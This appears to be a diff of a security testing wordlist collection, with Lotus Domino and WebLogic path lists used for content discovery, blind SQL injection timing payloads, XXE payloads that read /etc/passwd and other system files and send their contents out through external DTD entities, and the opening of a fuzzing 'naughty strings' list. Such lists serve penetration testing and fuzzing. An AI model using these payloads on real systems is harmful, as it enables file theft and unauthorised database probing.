stdomino.nsf
|
||||
sthelpad.nsf
|
||||
stinstall.nsf
|
||||
stlog.nsf
|
||||
stnamechange.nsf
|
||||
stnames.nsf
|
||||
stpolicy.nsf
|
||||
streg.nsf
|
||||
strn20.nsf
|
||||
stsrc.nsf
|
||||
svrinst.nsf
|
||||
system.nsf
|
||||
test.nsf
|
||||
today.nsf
|
||||
user.nsf
|
||||
userreg.nsf
|
||||
users.nsf
|
||||
vpuserinfo.nsf
|
||||
webadmin.nsf
|
||||
web.nsf
|
||||
webstart.nsf
|
||||
webstats.exe
|
||||
webuser.nsf
|
||||
welcome.nsf
|
||||
win.ini
|
||||
wksinst.nsf
|
||||
wwsample.nsf
|
||||
zmevladm.nsf
|
@ -109,6 +109,7 @@ iNotes/Forms5.nsf/$DefaultNav
|
||||
iNotes/Forms6.nsf
|
||||
iNotes/Forms7.nsf
|
||||
iNotes/Forms8.nsf
|
||||
iNotes/Forms9.nsf
|
||||
iNotes/help65_iwa_en.nsf
|
||||
iNotes/help70_iwa_en.nsf
|
||||
iNotes/help80_iwa_en.nsf
|
||||
@ -289,3 +290,12 @@ vpuserinfo.nsf
|
||||
web.nsf
|
||||
webadmin.nsf
|
||||
welcome.nsf
|
||||
help/readme.nsf?OpenAbout
|
||||
download/filesets/l_LOTUS_SCRIPT.inf
|
||||
download/filesets/n_LOTUS_SCRIPT.inf
|
||||
download/filesets/l_SEARCH.inf
|
||||
download/filesets/n_SEARCH.inf
|
||||
Help/help9_admin.nsf
|
||||
Help/help9_client.nsf
|
||||
Help/help9_designer.nsf
|
||||
api
|
||||
|
@ -1,361 +1,360 @@
|
||||
*
|
||||
*.gif
|
||||
*.gif/
|
||||
*.html
|
||||
*.jsp
|
||||
*.jsp/
|
||||
*.jws
|
||||
*.portal
|
||||
*.portion
|
||||
*.portlet
|
||||
*.shtml/
|
||||
Admin
|
||||
AdminCaptureRootCA
|
||||
AdminClients
|
||||
AdminConnections
|
||||
AdminEvents
|
||||
AdminJDBC
|
||||
AdminLicense
|
||||
AdminMain
|
||||
AdminProps
|
||||
AdminRealm
|
||||
AdminThreads
|
||||
AdminVersion
|
||||
BizTalkServer
|
||||
Bootstrap
|
||||
Certificate
|
||||
Classpath/
|
||||
ConsoleHelp
|
||||
ConsoleHelp/
|
||||
DefaultWebApp
|
||||
DeploymentService
|
||||
FileServlet
|
||||
HTTPClntClose
|
||||
HTTPClntClose/*
|
||||
HTTPClntLogin
|
||||
HTTPClntLogin/*
|
||||
HTTPClntRecv
|
||||
HTTPClntRecv/*
|
||||
HTTPClntSend
|
||||
HTTPClntSend/*
|
||||
JspServlet
|
||||
LogfileSearch
|
||||
LogfileTail
|
||||
Login.jsp
|
||||
MANIFEST.MF
|
||||
META-INF
|
||||
Samples
|
||||
SamplesSearchWebApp
|
||||
Shutdown
|
||||
Shutdown/*
|
||||
SimpappServlet
|
||||
SimpleClientJws
|
||||
SimpleClientProviderImpl
|
||||
StockServlet
|
||||
T3AdminMain
|
||||
UniversityServlet
|
||||
WEB-INF
|
||||
WEB-INF./web.xml
|
||||
WEB-INF/web.xml
|
||||
WLDummyInitJVMIDs
|
||||
WebServiceServlet
|
||||
_async
|
||||
_async/*
|
||||
_async/AsyncResponseService
|
||||
_async/AsyncResponseServiceHttps
|
||||
_async/AsyncResponseServiceJms
|
||||
_async/AsyncResponseServiceSoap12
|
||||
_async/AsyncResponseServiceSoap12Https
|
||||
_async/AsyncResponseServiceSoap12Jms
|
||||
_tmp_war
|
||||
_tmp_war_DefaultWebApp
|
||||
a2e2gp2r2/*
|
||||
a2e2gp2r2/x.jsp
|
||||
accessor
|
||||
actions
|
||||
admin/login.do
|
||||
applet
|
||||
applications
|
||||
appmanager/*
|
||||
asyncServlet
|
||||
asyncServlet/main.jsp
|
||||
asyncServlet/receive
|
||||
asyncServlet/send
|
||||
authenticatedy
|
||||
bea-guardian-agent
|
||||
bea-guardian-agent/
|
||||
bea-guardian-agent/DeployServlet
|
||||
bea-guardian-agent/test.jsp
|
||||
bea-guardian-agent/version
|
||||
bea_wls9_async_response
|
||||
bea_wls_async_response
|
||||
bea_wls_cluster_internal
|
||||
bea_wls_cluster_internal/0056FABC093BDF49C8AE091F74400598
|
||||
bea_wls_cluster_internal/a2e2gp2r2/*
|
||||
bea_wls_cluster_internal/psquare/*
|
||||
bea_wls_deployment_internal
|
||||
bea_wls_deployment_internal/*
|
||||
bea_wls_deployment_internal/DeploymentService
|
||||
bea_wls_diagnostics
|
||||
bea_wls_diagnostics/*
|
||||
bea_wls_diagnostics/accessor
|
||||
bea_wls_internal
|
||||
bea_wls_internal/
|
||||
bea_wls_internal/*
|
||||
bea_wls_internal/HTTPClntClose
|
||||
bea_wls_internal/HTTPClntClose/*
|
||||
bea_wls_internal/HTTPClntLogin
|
||||
bea_wls_internal/HTTPClntLogin/*
|
||||
bea_wls_internal/HTTPClntRecv
|
||||
bea_wls_internal/HTTPClntRecv/*
|
||||
bea_wls_internal/HTTPClntSend
|
||||
bea_wls_internal/HTTPClntSend/*
|
||||
bea_wls_internal/WLDummyInitJVMIDs
|
||||
bea_wls_internal/WebServiceServlet
|
||||
bea_wls_internal/a2e2gp2r2/x.jsp
|
||||
bea_wls_internal/classes/
|
||||
bea_wls_internal/classes/
|
||||
bea_wls_internal/classes/*
|
||||
bea_wls_internal/classes/META-INF/MANIFEST.MF
|
||||
bea_wls_internal/com/*
|
||||
bea_wls_internal/getior
|
||||
bea_wls_internal/getior/*
|
||||
bea_wls_internal/iiop/ClientClose
|
||||
bea_wls_internal/iiop/ClientClose/*
|
||||
bea_wls_internal/iiop/ClientLogin
|
||||
bea_wls_internal/iiop/ClientLogin/*
|
||||
bea_wls_internal/iiop/ClientRecv
|
||||
bea_wls_internal/iiop/ClientRecv/*
|
||||
bea_wls_internal/iiop/ClientSend
|
||||
bea_wls_internal/iiop/ClientSend/*
|
||||
bea_wls_internal/psquare/x.jsp
|
||||
bea_wls_management_internal2
|
||||
bea_wls_management_internal2/Bootstrap
|
||||
bea_wls_management_internal2/wl_management
|
||||
bea_wls_remote_deployer
|
||||
beanManaged
|
||||
certificate
|
||||
classes
|
||||
classes/
|
||||
classes/*
|
||||
classes/META-INF/MANIFEST.MF
|
||||
com
|
||||
com.acumenat.uddi.server.http.UDDIListenerServlet
|
||||
com.bea.guardian.agent.VersionServlet
|
||||
com.bea.guardian.agent.weblogic.DeployServlet
|
||||
com.bea.guardian.agent.weblogic.DispatchServlet
|
||||
com/*
|
||||
cometd/*
|
||||
common
|
||||
config
|
||||
console
|
||||
console-help
|
||||
console-help/doc/*
|
||||
console-help/doc/en-us/com/bea/wlserver/core/index.html
|
||||
console-help/help/*
|
||||
console-help/online_search/*
|
||||
console/login/LoginForm.jsp
|
||||
consoleapp
|
||||
consolehelp
|
||||
consolehelp/console-help.portal
|
||||
consolehelp/index.jsp
|
||||
cookies
|
||||
default
|
||||
docs
|
||||
docs/SamplesSearchServlet/*
|
||||
docs/core/index.html
|
||||
docs/index.html
|
||||
docs51
|
||||
domain
|
||||
drp-exports
|
||||
drp-publish
|
||||
dummy
|
||||
e2ePortalProject/Login.portal
|
||||
ejb
|
||||
ejb20BeanMged
|
||||
ejb20BeanMgedEar
|
||||
ejb20_beanManaged
|
||||
ejb30
|
||||
ejbSimpappServlet
|
||||
error
|
||||
examplesWebApp
|
||||
examplesWebApp/*
|
||||
examplesWebApp/ConnectorServlet
|
||||
examplesWebApp/EJBeanManagedClient.jsp
|
||||
examplesWebApp/InteractiveQuery.jsp
|
||||
examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml
|
||||
examplesWebApp/SSLClientServlet
|
||||
examplesWebApp/SenderServlet
|
||||
examplesWebApp/SessionServlet
|
||||
examplesWebApp/Shutdown -> 401
|
||||
examplesWebApp/SimpleSqlServlet
|
||||
examplesWebApp/WebservicesEJB.jsp
|
||||
examplesWebApp/Wsdl2Service.jsp
|
||||
examplesWebApp/docs -> /docs
|
||||
examplesWebApp/docs/
|
||||
examplesWebApp/domains
|
||||
examplesWebApp/examples
|
||||
examplesWebApp/examples/src/examples/copyright.html
|
||||
examplesWebApp/images
|
||||
examplesWebApp/index.jsp
|
||||
examplesWebApp/medrec
|
||||
examplesWebApp/server
|
||||
ext_servlet_annotations
|
||||
ext_servlet_annotations/loginForm.jsp
|
||||
ext_servlet_annotations/session
|
||||
fast_track.html
|
||||
fault
|
||||
file
|
||||
file/
|
||||
fileRealm
|
||||
fileRealm.properties
|
||||
framework/skeletons/console/*
|
||||
framework/skeletons/console/css/*
|
||||
framework/skeletons/console/js/*
|
||||
getior
|
||||
getior/*
|
||||
graphics
|
||||
helloKona
|
||||
helloWebApp
|
||||
helloWebApp/hello.html
|
||||
helloWebApp/hello.jsp
|
||||
helloWorld
|
||||
iiop/ClientClose
|
||||
iiop/ClientClose/*
|
||||
iiop/ClientLogin
|
||||
iiop/ClientLogin/*
|
||||
iiop/ClientRecv
|
||||
iiop/ClientRecv/*
|
||||
iiop/ClientSend
|
||||
iiop/ClientSend/*
|
||||
images
|
||||
images/*
|
||||
index
|
||||
index.jsp
|
||||
internal
|
||||
jdbcRowSets
|
||||
jdbcRowSetsEar
|
||||
jdbc_rowsets
|
||||
jmssender
|
||||
jmstrader
|
||||
jsp/*
|
||||
jspSimpleTag
|
||||
jspSimpleTagEar
|
||||
jspbuild
|
||||
jws_basic_simple
|
||||
jws_basic_simple/SimpleService
|
||||
jwsdir
|
||||
login.jsp
|
||||
mainWebApp
|
||||
manifest.mf
|
||||
mapping
|
||||
mejb
|
||||
mydomain
|
||||
myservlet
|
||||
org.apache.beehive.netui.pageflow.PageFlowActionServlet
|
||||
org.apache.beehive.netui.pageflow.xmlhttprequest.XmlHttpRequestServlet
|
||||
page
|
||||
patient/login.do
|
||||
patient/register.do
|
||||
phone
|
||||
physican/login.do
|
||||
portalAppAdmin/login.jsp
|
||||
properties
|
||||
proxy
|
||||
psquare/*
|
||||
psquare/x.jsp
|
||||
public_html
|
||||
registerServlet
|
||||
reviewService
|
||||
reviewService/ClientServlet
|
||||
reviewService/InterceptorClientServlet
|
||||
reviewService/createArtist_service.jsp
|
||||
reviewService/dwr/*
|
||||
reviewService/index.jsp
|
||||
saml2
|
||||
samlacs
|
||||
samlars
|
||||
samlits
|
||||
samlits_ba
|
||||
samlits_cc
|
||||
servlet
|
||||
servletimages
|
||||
servlets/
|
||||
session
|
||||
simpapp
|
||||
simple
|
||||
simpleFormServlet
|
||||
snoop
|
||||
stock
|
||||
stock/*
|
||||
stock/data/*
|
||||
stock/index.html
|
||||
stock/index.jsp
|
||||
stock/publisher.html
|
||||
stock/publisher.jsp
|
||||
survey
|
||||
system
|
||||
taglib-uri
|
||||
uddi
|
||||
uddi/*
|
||||
uddi/uddilistener
|
||||
uddiexplorer
|
||||
uddiexplorer/*
|
||||
uddiexplorer/Login.jsp
|
||||
uddiexplorer/index.jsp
|
||||
uddilistener
|
||||
user
|
||||
utils
|
||||
web
|
||||
web.xml
|
||||
webappCachingEar
|
||||
weblogic
|
||||
weblogic.cluster.GroupMessageHandlerServlet
|
||||
weblogic.cluster.MulticastSessionDataRecoveryServlet
|
||||
weblogic.cluster.StateDumpServlet
|
||||
weblogic.deploy.service.internal.transport.http.DeploymentServiceServlet
|
||||
weblogic.jar
|
||||
weblogic.management.servlet.BootstrapServlet
|
||||
weblogic.management.servlet.FileDistributionServlet
|
||||
weblogic.properties
|
||||
weblogic.rjvm.InternalWebAppListener
|
||||
weblogic.servlet.AsyncInitServlet
|
||||
weblogic.servlet.FileServlet
|
||||
weblogic.servlet.JSPClassServlet
|
||||
weblogic.testclient.CallbackHandler
|
||||
weblogic.wsee.async.AsyncResponseBean
|
||||
weblogic.wsee.async.AsyncResponseBeanSoap12
|
||||
weblogic.xml
|
||||
weblogic90
|
||||
webservice
|
||||
webservicesJwsSimpleEar
|
||||
webshare
|
||||
wl_management
|
||||
wl_management_internal
|
||||
wl_management_internal1
|
||||
wl_management_internal1/LogfileSearch
|
||||
wl_management_internal1/LogfileTail
|
||||
wl_management_internal2
|
||||
wl_management_internal2/Admin
|
||||
wl_management_internal2/Bootstrap
|
||||
wl_management_internal2/FileDistribution
|
||||
wl_management_internal2/wl_management
|
||||
wliconsole
|
||||
wls_utc
|
||||
wls_utc/*.do
|
||||
wls_utc/*.jpf
|
||||
wls_utc/*.render
|
||||
wls_utc/*.xhr
|
||||
wls_utc/CallbackHandler
|
||||
wls_utc/begin.do
|
||||
wls_utc/error.jsp
|
||||
wls_utc/index.html
|
||||
wls_utc/index.jsp
|
||||
wls_utc/messageLog.jsp
|
||||
wls_utc/selectWsdl.jsp
|
||||
wls_utc4
|
||||
wlserver
|
||||
wlstestclient
|
||||
wsee
|
||||
xmlBean
|
||||
xml_xmlBean
|
||||
/*
|
||||
/*.gif
|
||||
/*.gif/
|
||||
/*.html
|
||||
/*.jsp
|
||||
/*.jsp/
|
||||
/*.jws
|
||||
/*.portal
|
||||
/*.portion
|
||||
/*.portlet
|
||||
/*.shtml/
|
||||
/Admin
|
||||
/AdminCaptureRootCA
|
||||
/AdminClients
|
||||
/AdminConnections
|
||||
/AdminEvents
|
||||
/AdminJDBC
|
||||
/AdminLicense
|
||||
/AdminMain
|
||||
/AdminProps
|
||||
/AdminRealm
|
||||
/AdminThreads
|
||||
/AdminVersion
|
||||
/BizTalkServer
|
||||
/Bootstrap
|
||||
/Certificate
|
||||
/Classpath/
|
||||
/ConsoleHelp
|
||||
/ConsoleHelp/
|
||||
/DefaultWebApp
|
||||
/DeploymentService
|
||||
/FileServlet
|
||||
/HTTPClntClose
|
||||
/HTTPClntClose/*
|
||||
/HTTPClntLogin
|
||||
/HTTPClntLogin/*
|
||||
/HTTPClntRecv
|
||||
/HTTPClntRecv/*
|
||||
/HTTPClntSend
|
||||
/HTTPClntSend/*
|
||||
/JspServlet
|
||||
/LogfileSearch
|
||||
/LogfileTail
|
||||
/Login.jsp
|
||||
/MANIFEST.MF
|
||||
/META-INF
|
||||
/Samples
|
||||
/SamplesSearchWebApp
|
||||
/Shutdown
|
||||
/Shutdown/*
|
||||
/SimpappServlet
|
||||
/SimpleClientJws
|
||||
/SimpleClientProviderImpl
|
||||
/StockServlet
|
||||
/T3AdminMain
|
||||
/UniversityServlet
|
||||
/WEB-INF
|
||||
/WEB-INF./web.xml
|
||||
/WEB-INF/web.xml
|
||||
/WLDummyInitJVMIDs
|
||||
/WebServiceServlet
|
||||
/_async
|
||||
/_async/*
|
||||
/_async/AsyncResponseService
|
||||
/_async/AsyncResponseServiceHttps
|
||||
/_async/AsyncResponseServiceJms
|
||||
/_async/AsyncResponseServiceSoap12
|
||||
/_async/AsyncResponseServiceSoap12Https
|
||||
/_async/AsyncResponseServiceSoap12Jms
|
||||
/_tmp_war
|
||||
/_tmp_war_DefaultWebApp
|
||||
/a2e2gp2r2/*
|
||||
/a2e2gp2r2/x.jsp
|
||||
/accessor
|
||||
/actions
|
||||
/admin/login.do
|
||||
/applet
|
||||
/applications
|
||||
/appmanager/*
|
||||
/asyncServlet
|
||||
/asyncServlet/main.jsp
|
||||
/asyncServlet/receive
|
||||
/asyncServlet/send
|
||||
/authenticatedy
|
||||
/bea-guardian-agent
|
||||
/bea-guardian-agent/
|
||||
/bea-guardian-agent/DeployServlet
|
||||
/bea-guardian-agent/test.jsp
|
||||
/bea-guardian-agent/version
|
||||
/bea_wls9_async_response
|
||||
/bea_wls_async_response
|
||||
/bea_wls_cluster_internal
|
||||
/bea_wls_cluster_internal/0056FABC093BDF49C8AE091F74400598
|
||||
/bea_wls_cluster_internal/a2e2gp2r2/*
|
||||
/bea_wls_cluster_internal/psquare/*
|
||||
/bea_wls_deployment_internal
|
||||
/bea_wls_deployment_internal/*
|
||||
/bea_wls_deployment_internal/DeploymentService
|
||||
/bea_wls_diagnostics
|
||||
/bea_wls_diagnostics/*
|
||||
/bea_wls_diagnostics/accessor
|
||||
/bea_wls_internal
|
||||
/bea_wls_internal/
|
||||
/bea_wls_internal/*
|
||||
/bea_wls_internal/HTTPClntClose
|
||||
/bea_wls_internal/HTTPClntClose/*
|
||||
/bea_wls_internal/HTTPClntLogin
|
||||
/bea_wls_internal/HTTPClntLogin/*
|
||||
/bea_wls_internal/HTTPClntRecv
|
||||
/bea_wls_internal/HTTPClntRecv/*
|
||||
/bea_wls_internal/HTTPClntSend
|
||||
/bea_wls_internal/HTTPClntSend/*
|
||||
/bea_wls_internal/WLDummyInitJVMIDs
|
||||
/bea_wls_internal/WebServiceServlet
|
||||
/bea_wls_internal/a2e2gp2r2/x.jsp
|
||||
/bea_wls_internal/classes/
|
||||
/bea_wls_internal/classes/*
|
||||
/bea_wls_internal/classes/META-INF/MANIFEST.MF
|
||||
/bea_wls_internal/com/*
|
||||
/bea_wls_internal/getior
|
||||
/bea_wls_internal/getior/*
|
||||
/bea_wls_internal/iiop/ClientClose
|
||||
/bea_wls_internal/iiop/ClientClose/*
|
||||
/bea_wls_internal/iiop/ClientLogin
|
||||
/bea_wls_internal/iiop/ClientLogin/*
|
||||
/bea_wls_internal/iiop/ClientRecv
|
||||
/bea_wls_internal/iiop/ClientRecv/*
|
||||
/bea_wls_internal/iiop/ClientSend
|
||||
/bea_wls_internal/iiop/ClientSend/*
|
||||
/bea_wls_internal/psquare/x.jsp
|
||||
/bea_wls_management_internal2
|
||||
/bea_wls_management_internal2/Bootstrap
|
||||
/bea_wls_management_internal2/wl_management
|
||||
/bea_wls_remote_deployer
|
||||
/beanManaged
|
||||
/certificate
|
||||
/classes
|
||||
/classes/
|
||||
/classes/*
|
||||
/classes/META-INF/MANIFEST.MF
|
||||
/com
|
||||
/com.acumenat.uddi.server.http.UDDIListenerServlet
|
||||
/com.bea.guardian.agent.VersionServlet
|
||||
/com.bea.guardian.agent.weblogic.DeployServlet
|
||||
/com.bea.guardian.agent.weblogic.DispatchServlet
|
||||
/com/*
|
||||
/cometd/*
|
||||
/common
|
||||
/config
|
||||
/console
|
||||
/console-help
|
||||
/console-help/doc/*
|
||||
/console-help/doc/en-us/com/bea/wlserver/core/index.html
|
||||
/console-help/help/*
|
||||
/console-help/online_search/*
|
||||
/console/login/LoginForm.jsp
|
||||
/consoleapp
|
||||
/consolehelp
|
||||
/consolehelp/console-help.portal
|
||||
/consolehelp/index.jsp
|
||||
/cookies
|
||||
/default
|
||||
/docs
|
||||
/docs/SamplesSearchServlet/*
|
||||
/docs/core/index.html
|
||||
/docs/index.html
|
||||
/docs51
|
||||
/domain
|
||||
/drp-exports
|
||||
/drp-publish
|
||||
/dummy
|
||||
/e2ePortalProject/Login.portal
|
||||
/ejb
|
||||
/ejb20BeanMged
|
||||
/ejb20BeanMgedEar
|
||||
/ejb20_beanManaged
|
||||
/ejb30
|
||||
/ejbSimpappServlet
|
||||
/error
|
||||
/examplesWebApp
|
||||
/examplesWebApp/*
|
||||
/examplesWebApp/ConnectorServlet
|
||||
/examplesWebApp/EJBeanManagedClient.jsp
|
||||
/examplesWebApp/InteractiveQuery.jsp
|
||||
/examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml
|
||||
/examplesWebApp/SSLClientServlet
|
||||
/examplesWebApp/SenderServlet
|
||||
/examplesWebApp/SessionServlet
|
||||
/examplesWebApp/Shutdown -> 401
|
||||
/examplesWebApp/SimpleSqlServlet
|
||||
/examplesWebApp/WebservicesEJB.jsp
|
||||
/examplesWebApp/Wsdl2Service.jsp
|
||||
/examplesWebApp/docs -> /docs
|
||||
/examplesWebApp/docs/
|
||||
/examplesWebApp/domains
|
||||
/examplesWebApp/examples
|
||||
/examplesWebApp/examples/src/examples/copyright.html
|
||||
/examplesWebApp/images
|
||||
/examplesWebApp/index.jsp
|
||||
/examplesWebApp/medrec
|
||||
/examplesWebApp/server
|
||||
/ext_servlet_annotations
|
||||
/ext_servlet_annotations/loginForm.jsp
|
||||
/ext_servlet_annotations/session
|
||||
/fast_track.html
|
||||
/fault
|
||||
/file
|
||||
/file/
|
||||
/fileRealm
|
||||
/fileRealm.properties
|
||||
/framework/skeletons/console/*
|
||||
/framework/skeletons/console/css/*
|
||||
/framework/skeletons/console/js/*
|
||||
/getior
|
||||
/getior/*
|
||||
/graphics
|
||||
/helloKona
|
||||
/helloWebApp
|
||||
/helloWebApp/hello.html
|
||||
/helloWebApp/hello.jsp
|
||||
/helloWorld
|
||||
/iiop/ClientClose
|
||||
/iiop/ClientClose/*
|
||||
/iiop/ClientLogin
|
||||
/iiop/ClientLogin/*
|
||||
/iiop/ClientRecv
|
||||
/iiop/ClientRecv/*
|
||||
/iiop/ClientSend
|
||||
/iiop/ClientSend/*
|
||||
/images
|
||||
/images/*
|
||||
/index
|
||||
/index.jsp
|
||||
/internal
|
||||
/jdbcRowSets
|
||||
/jdbcRowSetsEar
|
||||
/jdbc_rowsets
|
||||
/jmssender
|
||||
/jmstrader
|
||||
/jsp/*
|
||||
/jspSimpleTag
|
||||
/jspSimpleTagEar
|
||||
/jspbuild
|
||||
/jws_basic_simple
|
||||
/jws_basic_simple/SimpleService
|
||||
/jwsdir
|
||||
/login.jsp
|
||||
/mainWebApp
|
||||
/manifest.mf
|
||||
/mapping
|
||||
/mejb
|
||||
/mydomain
|
||||
/myservlet
|
||||
/org.apache.beehive.netui.pageflow.PageFlowActionServlet
|
||||
/org.apache.beehive.netui.pageflow.xmlhttprequest.XmlHttpRequestServlet
|
||||
/page
|
||||
/patient/login.do
|
||||
/patient/register.do
|
||||
/phone
|
||||
/physican/login.do
|
||||
/portalAppAdmin/login.jsp
|
||||
/properties
|
||||
/proxy
|
||||
/psquare/*
|
||||
/psquare/x.jsp
|
||||
/public_html
|
||||
/registerServlet
|
||||
/reviewService
|
||||
/reviewService/ClientServlet
|
||||
/reviewService/InterceptorClientServlet
|
||||
/reviewService/createArtist_service.jsp
|
||||
/reviewService/dwr/*
|
||||
/reviewService/index.jsp
|
||||
/saml2
|
||||
/samlacs
|
||||
/samlars
|
||||
/samlits
|
||||
/samlits_ba
|
||||
/samlits_cc
|
||||
/servlet
|
||||
/servletimages
|
||||
/servlets/
|
||||
/session
|
||||
/simpapp
|
||||
/simple
|
||||
/simpleFormServlet
|
||||
/snoop
|
||||
/stock
|
||||
/stock/*
|
||||
/stock/data/*
|
||||
/stock/index.html
|
||||
/stock/index.jsp
|
||||
/stock/publisher.html
|
||||
/stock/publisher.jsp
|
||||
/survey
|
||||
/system
|
||||
/taglib-uri
|
||||
/uddi
|
||||
/uddi/*
|
||||
/uddi/uddilistener
|
||||
/uddiexplorer
|
||||
/uddiexplorer/*
|
||||
/uddiexplorer/Login.jsp
|
||||
/uddiexplorer/index.jsp
|
||||
/uddilistener
|
||||
/user
|
||||
/utils
|
||||
/web
|
||||
/web.xml
|
||||
/webappCachingEar
|
||||
/weblogic
|
||||
/weblogic.cluster.GroupMessageHandlerServlet
|
||||
/weblogic.cluster.MulticastSessionDataRecoveryServlet
|
||||
/weblogic.cluster.StateDumpServlet
|
||||
/weblogic.deploy.service.internal.transport.http.DeploymentServiceServlet
|
||||
/weblogic.jar
|
||||
/weblogic.management.servlet.BootstrapServlet
|
||||
/weblogic.management.servlet.FileDistributionServlet
|
||||
/weblogic.properties
|
||||
/weblogic.rjvm.InternalWebAppListener
|
||||
/weblogic.servlet.AsyncInitServlet
|
||||
/weblogic.servlet.FileServlet
|
||||
/weblogic.servlet.JSPClassServlet
|
||||
/weblogic.testclient.CallbackHandler
|
||||
/weblogic.wsee.async.AsyncResponseBean
|
||||
/weblogic.wsee.async.AsyncResponseBeanSoap12
|
||||
/weblogic.xml
|
||||
/weblogic90
|
||||
/webservice
|
||||
/webservicesJwsSimpleEar
|
||||
/webshare
|
||||
/wl_management
|
||||
/wl_management_internal
|
||||
/wl_management_internal1
|
||||
/wl_management_internal1/LogfileSearch
|
||||
/wl_management_internal1/LogfileTail
|
||||
/wl_management_internal2
|
||||
/wl_management_internal2/Admin
|
||||
/wl_management_internal2/Bootstrap
|
||||
/wl_management_internal2/FileDistribution
|
||||
/wl_management_internal2/wl_management
|
||||
/wliconsole
|
||||
/wls_utc
|
||||
/wls_utc/*.do
|
||||
/wls_utc/*.jpf
|
||||
/wls_utc/*.render
|
||||
/wls_utc/*.xhr
|
||||
/wls_utc/CallbackHandler
|
||||
/wls_utc/begin.do
|
||||
/wls_utc/error.jsp
|
||||
/wls_utc/index.html
|
||||
/wls_utc/index.jsp
|
||||
/wls_utc/messageLog.jsp
|
||||
/wls_utc/selectWsdl.jsp
|
||||
/wls_utc4
|
||||
/wlserver
|
||||
/wlstestclient
|
||||
/wsee
|
||||
/xmlBean
|
||||
/xml_xmlBean
|
||||
|
File diff suppressed because it is too large
Load Diff
@ -1,2 +1,3 @@
|
||||
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
|
||||
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
|
||||
|
Before Width: | Height: | Size: 4.1 KiB After Width: | Height: | Size: 4.1 KiB |
@ -1,3 +1,4 @@
|
||||
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
|
||||
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
|
||||
@ -44,5 +45,7 @@ x' or name()='username' or 'x'='y
|
||||
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
|
||||
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
|
||||
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://127.0.0.1:80/?%file;'> "> %int;
|
||||
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>">
|
||||
<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
|
||||
<!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
|
||||
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
||||
|
687
Fuzzing/big-list-of-naughty-strings.txt
Normal file
687
Fuzzing/big-list-of-naughty-strings.txt
Normal file
@ -0,0 +1,687 @@
|
||||
# Reserved Strings
|
||||
#
|
||||
# Strings which may be used elsewhere in code
|
||||
|
||||
undefined
|
||||
undef
|
||||
null
|
||||
NULL
|
||||
(null)
|
||||
nil
|
||||
NIL
|
||||
true
|
||||
false
|
||||
True
|
||||
False
|
||||
TRUE
|
||||
FALSE
|
||||
None
|
||||
hasOwnProperty
|
||||
\
|
||||
\\
|
||||
|
||||
# Numeric Strings
|
||||
#
|
||||
# Strings which can be interpreted as numeric
|
||||
|
||||
0
|
||||
1
|
||||
1.00
|
||||
$1.00
|
||||
1/2
|
||||
1E2
|
||||
1E02
|
||||
1E+02
|
||||
-1
|
||||
-1.00
|
||||
-$1.00
|
||||
-1/2
|
||||
-1E2
|
||||
-1E02
|
||||
-1E+02
|
||||
1/0
|
||||
0/0
|
||||
-2147483648/-1
|
||||
-9223372036854775808/-1
|
||||
-0
|
||||
-0.0
|
||||
+0
|
||||
+0.0
|
||||
0.00
|
||||
0..0
|
||||
.
|
||||
0.0.0
|
||||
0,00
|
||||
0,,0
|
||||
,
|
||||
0,0,0
|
||||
0.0/0
|
||||
1.0/0.0
|
||||
0.0/0.0
|
||||
1,0/0,0
|
||||
0,0/0,0
|
||||
--1
|
||||
-
|
||||
-.
|
||||
-,
|
||||
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
|
||||
NaN
|
||||
Infinity
|
||||
-Infinity
|
||||
INF
|
||||
1#INF
|
||||
-1#IND
|
||||
1#QNAN
|
||||
1#SNAN
|
||||
1#IND
|
||||
0x0
|
||||
0xffffffff
|
||||
0xffffffffffffffff
|
||||
0xabad1dea
|
||||
123456789012345678901234567890123456789
|
||||
1,000.00
|
||||
1 000.00
|
||||
1'000.00
|
||||
1,000,000.00
|
||||
1 000 000.00
|
||||
1'000'000.00
|
||||
1.000,00
|
||||
1 000,00
|
||||
1'000,00
|
||||
1.000.000,00
|
||||
1 000 000,00
|
||||
1'000'000,00
|
||||
01000
|
||||
08
|
||||
09
|
||||
2.2250738585072011e-308
|
||||
|
||||
# Special Characters
|
||||
#
|
||||
# ASCII punctuation. All of these characters may need to be escaped in some
|
||||
# contexts. Divided into three groups based on (US-layout) keyboard position.
